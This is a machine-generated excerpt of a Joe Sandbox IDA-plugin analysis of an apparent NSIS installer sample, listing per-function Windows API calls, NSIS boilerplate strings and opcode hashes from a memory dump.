                                                                  • Opcode Fuzzy Hash: e0d780eba1b088fa93d6fd4ed72d6ff884873a26146dcd9c5e819f50ed4c5972
                                                                  • Instruction Fuzzy Hash: 09C1B0B1500204AFDB216F25EE85E2B7AB9EB8630AF00853EF741B11F1CB3D59529B5D
                                                                  APIs
                                                                    • Part of subcall function 00406385: GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
                                                                    • Part of subcall function 00406385: GetProcAddress.KERNEL32(00000000,?), ref: 004063B2
                                                                  • lstrcatA.KERNEL32(007AA000,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,76F93410,007AA400,007A9000), ref: 00403885
                                                                  • lstrlenA.KERNEL32(007A1EE0,007A9400,?,?,007A1EE0,00000000,007A9400,007AA000,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,76F93410), ref: 004038FA
                                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 0040390D
                                                                  • GetFileAttributesA.KERNEL32(007A1EE0), ref: 00403918
                                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,007A9400), ref: 00403961
                                                                    • Part of subcall function 00405F4B: wsprintfA.USER32 ref: 00405F58
                                                                  • RegisterClassA.USER32(007A26E0), ref: 0040399E
                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004039B6
                                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039EB
                                                                  • ShowWindow.USER32(00000005), ref: 00403A21
                                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,007A26E0), ref: 00403A4D
                                                                  • GetClassInfoA.USER32(00000000,RichEdit,007A26E0), ref: 00403A5A
                                                                  • RegisterClassA.USER32(007A26E0), ref: 00403A63
                                                                  • DialogBoxParamA.USER32(?,00000000,00403BA7,00000000), ref: 00403A82
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$&z
                                                                  • API String ID: 1975747703-471597453
                                                                  • Opcode ID: 6a61cbbd4cf0e9c1d01e5c8b3980943b7258060f4ff29637f7b3df1c92db6b4f
                                                                  • Instruction ID: 79248491ef2bc55f5e0c4717b820805706146ebb855d4f379394f0877404e8f0
                                                                  • Opcode Fuzzy Hash: 6a61cbbd4cf0e9c1d01e5c8b3980943b7258060f4ff29637f7b3df1c92db6b4f
                                                                  • Instruction Fuzzy Hash: 6C61C6B0240640BED610AF659D45F3B3A6CD785749F10813FF985B62E2DB7D9D028B2D
                                                                  APIs
                                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404271
                                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 00404285
                                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004042A3
                                                                  • GetSysColor.USER32(?), ref: 004042B4
                                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004042C3
                                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004042D2
                                                                  • lstrlenA.KERNEL32(?), ref: 004042D5
                                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042E4
                                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042F9
                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040435B
                                                                  • SendMessageA.USER32(00000000), ref: 0040435E
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404389
                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004043C9
                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 004043D8
                                                                  • SetCursor.USER32(00000000), ref: 004043E1
                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 004043F7
                                                                  • SetCursor.USER32(00000000), ref: 004043FA
                                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404426
                                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040443A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                  • String ID: N
                                                                  • API String ID: 3103080414-1130791706
                                                                  • Opcode ID: 614c9b85214c3d5e686e74a77366cc7cd529f3e87e761fa153b01f37f43dbd0e
                                                                  • Instruction ID: a3db5b80d5f6c8d56f7a184239f37e003a0a90a84a660de175ffc46cbe068f47
                                                                  • Opcode Fuzzy Hash: 614c9b85214c3d5e686e74a77366cc7cd529f3e87e761fa153b01f37f43dbd0e
                                                                  • Instruction Fuzzy Hash: D361B5B1A40204BFEF109F60DD45F6A7B69FB84704F10802AFB05BA1D1C7B8A951CF99
                                                                  APIs
                                                                  • GetTempPathA.KERNEL32(00000400,007AA400,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403453
                                                                  • GetWindowsDirectoryA.KERNEL32(007AA400,000003FB,?,?,00000160), ref: 00403464
                                                                  • lstrcatA.KERNEL32(007AA400,\Temp,?,?,00000160), ref: 00403470
                                                                  • GetTempPathA.KERNEL32(000003FC,007AA400,007AA400,\Temp,?,?,00000160), ref: 00403484
                                                                  • lstrcatA.KERNEL32(007AA400,Low,?,?,00000160), ref: 0040348C
                                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,007AA400,007AA400,Low,?,?,00000160), ref: 0040349D
                                                                  • SetEnvironmentVariableA.KERNEL32(TMP,007AA400,?,?,00000160), ref: 004034A5
                                                                  • DeleteFileA.KERNEL32(007AA000,?,00000006,00000008,0000000A), ref: 004034B9
                                                                    • Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,007A2740,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA
                                                                  • OleUninitialize.OLE32(?,?,?,00000160), ref: 00403567
                                                                  • ExitProcess.KERNEL32 ref: 00403588
                                                                  • lstrcatA.KERNEL32(007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 0040359B
                                                                  • lstrcatA.KERNEL32(007AA400,0040A14C,007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 004035AA
                                                                  • lstrcatA.KERNEL32(007AA400,.tmp,007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 004035B5
                                                                  • lstrcmpiA.KERNEL32(007AA400,007A9C00), ref: 004035C1
                                                                  • SetCurrentDirectoryA.KERNEL32(007AA400,007AA400,?,?,?,?,00000160), ref: 004035DD
                                                                  • DeleteFileA.KERNEL32(0079E108,0079E108,?,007A4000,?,?,?,?,?,00000160), ref: 00403636
                                                                  • CopyFileA.KERNEL32(007AAC00,0079E108,00000001), ref: 0040364A
                                                                  • CloseHandle.KERNEL32(00000000,0079E108,0079E108,?,0079E108,?,?,?,?,?,00000160), ref: 00403677
                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,00000160), ref: 004036A5
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004036AC
                                                                  • LookupPrivilegeValueA.ADVAPI32(?,SeShutdownPrivilege,?), ref: 004036C4
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,?,?,?,?,?,SeShutdownPrivilege,?), ref: 004036E3
                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403707
                                                                  • ExitProcess.KERNEL32 ref: 0040372A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcat$Process$ExitFile$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableWindows$AdjustCloseCopyHandleLookupOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrcpyn
                                                                  • String ID: $"$Error launching installer$Low$TEMP$TMP$Vx+$\Temp
                                                                  • API String ID: 109303428-1567535582
                                                                  • Opcode ID: 47daceb2ab4096686ecc9a2b31aec42577ef1639cad44f253f4325b14c3c5fae
                                                                  • Instruction ID: ee86094215728b75d9dae95d605afab31ae71dc2a4c79600e913a2246e4d607c
                                                                  • Opcode Fuzzy Hash: 47daceb2ab4096686ecc9a2b31aec42577ef1639cad44f253f4325b14c3c5fae
                                                                  • Instruction Fuzzy Hash: 9451033050879069E7256F354D9962F7FE9ABC2306F08447FE4927A2E2CA7C4A04C72F
                                                                  APIs
                                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                  • DrawTextA.USER32(00000000,007A2740,000000FF,00000010,00000820), ref: 00401156
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                  • String ID: F
                                                                  • API String ID: 941294808-1304234792
                                                                  • Opcode ID: 05824d38ae5bde523e5173ae22b7a6f865c3ebb6508bc10e30638da455cbe7df
                                                                  • Instruction ID: 1ef7ef1d3183d2fe833be2fdc16277d02f602c466de40d92ea6efb336f18bcfe
                                                                  • Opcode Fuzzy Hash: 05824d38ae5bde523e5173ae22b7a6f865c3ebb6508bc10e30638da455cbe7df
                                                                  • Instruction Fuzzy Hash: 53417C71400249AFCB058FA5DE459BF7BB9FF45314F00802EF9A1AA1A0C778DA55DFA4
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorModeVersionlstrlen
                                                                  • String ID: $NSIS Error$UXTHEME
                                                                  • API String ID: 758611499-3141987311
                                                                  • Opcode ID: 5462c7cef10a1cbdaf0d8c8109fbba7c3d0b3e9ceb939e16fe40e67dfc00e37f
                                                                  • Instruction ID: 2a398feea240def2510372ba555c9adfae5b6ad84a20a3a993315f833025e39d
                                                                  • Opcode Fuzzy Hash: 5462c7cef10a1cbdaf0d8c8109fbba7c3d0b3e9ceb939e16fe40e67dfc00e37f
                                                                  • Instruction Fuzzy Hash: C731A3B0404341BFE7216F709E09B1B3EA8AB46309F00457EF9C5B62D2DB7C49098B6E
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000000,00000000,?,?,00405DED,?,?), ref: 00405C8D
                                                                  • GetShortPathNameA.KERNEL32(?,007A12D8,00000400), ref: 00405C96
                                                                    • Part of subcall function 00405AEB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                                    • Part of subcall function 00405AEB: lstrlenA.KERNEL32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000), ref: 00405B2D
                                                                  • GetShortPathNameA.KERNEL32(?,007A16D8,00000400), ref: 00405CB3
                                                                  • wsprintfA.USER32 ref: 00405CD1
                                                                  • GetFileSize.KERNEL32(00000000,00000000,007A16D8,C0000000,00000004,007A16D8,?), ref: 00405D0C
                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D1B
                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D53
                                                                  • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,007A0ED8,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405DA9
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405DBA
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405DC1
                                                                    • Part of subcall function 00405B86: GetFileAttributesA.KERNEL32(00000003,00402E04,007AAC00,80000000,00000003), ref: 00405B8A
                                                                    • Part of subcall function 00405B86: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BAC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                  • String ID: %s=%s$[Rename]
                                                                  • API String ID: 2171350718-1727408572
                                                                  • Opcode ID: d25c713501a9bf653a1fcacbbfc2014aaa95160241b761f08358092e952fb18f
                                                                  • Instruction ID: 4ef5f1c50d251b73862b961a89edc9b2cc60572935cd21a4370a6936b8511f12
                                                                  • Opcode Fuzzy Hash: d25c713501a9bf653a1fcacbbfc2014aaa95160241b761f08358092e952fb18f
                                                                  • Instruction Fuzzy Hash: 5231F231201B15ABD2206B659D4DF6B3A6CDF86754F14053FFA01F62D2EA3CE8058EAD
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040455C
                                                                  • SetWindowTextA.USER32(00000000,?), ref: 00404586
                                                                  • SHBrowseForFolderA.SHELL32(?,0079E920,?), ref: 00404637
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404642
                                                                  • lstrcmpiA.KERNEL32(007A1EE0,0079F548), ref: 00404674
                                                                  • lstrcatA.KERNEL32(?,007A1EE0), ref: 00404680
                                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404692
                                                                    • Part of subcall function 004056ED: GetDlgItemTextA.USER32(?,?,00000400,004046C9), ref: 00405700
                                                                    • Part of subcall function 00406257: CharNextA.USER32(?,*?|<>/":,00000000,007A9000,76F93410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062AF
                                                                    • Part of subcall function 00406257: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062BC
                                                                    • Part of subcall function 00406257: CharNextA.USER32(?,007A9000,76F93410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062C1
                                                                    • Part of subcall function 00406257: CharPrevA.USER32(?,?,76F93410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062D1
                                                                  • GetDiskFreeSpaceA.KERNEL32(0079E518,?,?,0000040F,?,0079E518,0079E518,?,00000001,0079E518,?,?,000003FB,?), ref: 00404750
                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040476B
                                                                    • Part of subcall function 004048C4: lstrlenA.KERNEL32(0079F548,0079F548,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047DF,000000DF,00000000,00000400,?), ref: 00404962
                                                                    • Part of subcall function 004048C4: wsprintfA.USER32 ref: 0040496A
                                                                    • Part of subcall function 004048C4: SetDlgItemTextA.USER32(?,0079F548), ref: 0040497D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: A
                                                                  • API String ID: 2624150263-3554254475
                                                                  • Opcode ID: 67040a0a49a64ce828be965077cda0b708920273d8bfda1b546e689113884970
                                                                  • Instruction ID: c53a8e09cffb511e2e8442f8e0ee4109053d5ca2156788ad792cf5210b9728ca
                                                                  • Opcode Fuzzy Hash: 67040a0a49a64ce828be965077cda0b708920273d8bfda1b546e689113884970
                                                                  • Instruction Fuzzy Hash: F4A17FB1900209ABDB11AFA5CD45AAFB7B8EF85314F14843BF601B62D1D77C8A418F69
                                                                  APIs
                                                                  • GetSystemDirectoryA.KERNEL32(007A1EE0,00000400), ref: 0040613A
                                                                  • GetWindowsDirectoryA.KERNEL32(007A1EE0,00000400,?,0079ED28,00000000,0040514C,0079ED28,?), ref: 0040614D
                                                                  • SHGetSpecialFolderLocation.SHELL32(LQ@(y,?,?,0079ED28,00000000,0040514C,0079ED28,?), ref: 00406189
                                                                  • SHGetPathFromIDListA.SHELL32(?,007A1EE0), ref: 00406197
                                                                  • CoTaskMemFree.OLE32(?), ref: 004061A3
                                                                  • lstrcatA.KERNEL32(007A1EE0,\Microsoft\Internet Explorer\Quick Launch), ref: 004061C7
                                                                  • lstrlenA.KERNEL32(007A1EE0,?,0079ED28,00000000,0040514C,0079ED28,?), ref: 00406219
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                  • String ID: .$LQ@(y$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                  • API String ID: 717251189-3515046496
                                                                  • Opcode ID: 355b90f3f401d120c3d4b6cf139cfaaf503aaee0dfbae073ec691654466f74a4
                                                                  • Instruction ID: d98bd44868bde6ace230f91b8fcf6596fc401970515ead307cdfb18f28ae641c
                                                                  • Opcode Fuzzy Hash: 355b90f3f401d120c3d4b6cf139cfaaf503aaee0dfbae073ec691654466f74a4
                                                                  • Instruction Fuzzy Hash: EE61F471904111AEDF11AF68CC84B7E3BA49B56314F16817FE903BA2D2C73C49A2CB4E
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(0079ED28), ref: 0040514D
                                                                  • lstrlenA.KERNEL32(?,0079ED28), ref: 0040515D
                                                                  • lstrcatA.KERNEL32(0079ED28,?,?,0079ED28), ref: 00405170
                                                                  • SetWindowTextA.USER32(0079ED28,0079ED28), ref: 00405182
                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
                                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                  • String ID: (y
                                                                  • API String ID: 2531174081-255812342
                                                                  • Opcode ID: 95f89131369c21242812949e714cdf1864596966d358f4f3b94d925066a10f3f
                                                                  • Instruction ID: bffe320471bb4ed621b5b80758aa42b14eae6e2fc0b22327473978c148379bdd
                                                                  • Opcode Fuzzy Hash: 95f89131369c21242812949e714cdf1864596966d358f4f3b94d925066a10f3f
                                                                  • Instruction Fuzzy Hash: 06219D71D00518BBDF119FA9CD80ADEBFB9EF05358F10807AF904B6291C6388E418FA8
                                                                  APIs
                                                                  • GetWindowLongA.USER32(?,000000EB), ref: 004040FF
                                                                  • GetSysColor.USER32(00000000), ref: 0040413D
                                                                  • SetTextColor.GDI32(?,00000000), ref: 00404149
                                                                  • SetBkMode.GDI32(?,?), ref: 00404155
                                                                  • GetSysColor.USER32(?), ref: 00404168
                                                                  • SetBkColor.GDI32(?,?), ref: 00404178
                                                                  • DeleteObject.GDI32(?), ref: 00404192
                                                                  • CreateBrushIndirect.GDI32(?), ref: 0040419C
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                  • String ID:
                                                                  • API String ID: 2320649405-0
                                                                  • Opcode ID: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
                                                                  • Instruction ID: 7e7a0635a9a9ad053635d0a61e184563e53fd5caf941e55c08cb8fd0a55be6c0
                                                                  • Opcode Fuzzy Hash: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
                                                                  • Instruction Fuzzy Hash: 312195715007049BD7309F68DD0CB5BBBF4AF91710B048A2EEA96A62E4C738D894CB54
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00402F73
                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,000000FF,00000000,00000000,?,?), ref: 00402FD9
                                                                    • Part of subcall function 00402D60: DestroyWindow.USER32(?,00000000,00402F3E,00000001), ref: 00402D73
                                                                  Strings
                                                                  • Inst, xrefs: 00402EA9
                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F9A
                                                                  • Null, xrefs: 00402EBB
                                                                  • soft, xrefs: 00402EB2
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: AllocDestroyFileGlobalPointerWindow
                                                                  • String ID: Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                  • API String ID: 1580554587-639894862
                                                                  • Opcode ID: aa602fcc84524977c216627ed963f5b7eedb9863e13b54dad4ba2881f4455998
                                                                  • Instruction ID: a92ccb9d8f619cb80c5c611e8c8ba1d2dc739ca40880e943336e7b39007ee354
                                                                  • Opcode Fuzzy Hash: aa602fcc84524977c216627ed963f5b7eedb9863e13b54dad4ba2881f4455998
                                                                  • Instruction Fuzzy Hash: 7E41C731900216AFDF109F64DA89B9E7B74EB54395F10403BE904B62D1C6BC9E81AB5D
                                                                  APIs
                                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049E9
                                                                  • GetMessagePos.USER32 ref: 004049F1
                                                                  • ScreenToClient.USER32(?,?), ref: 00404A0B
                                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404A1D
                                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A43
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
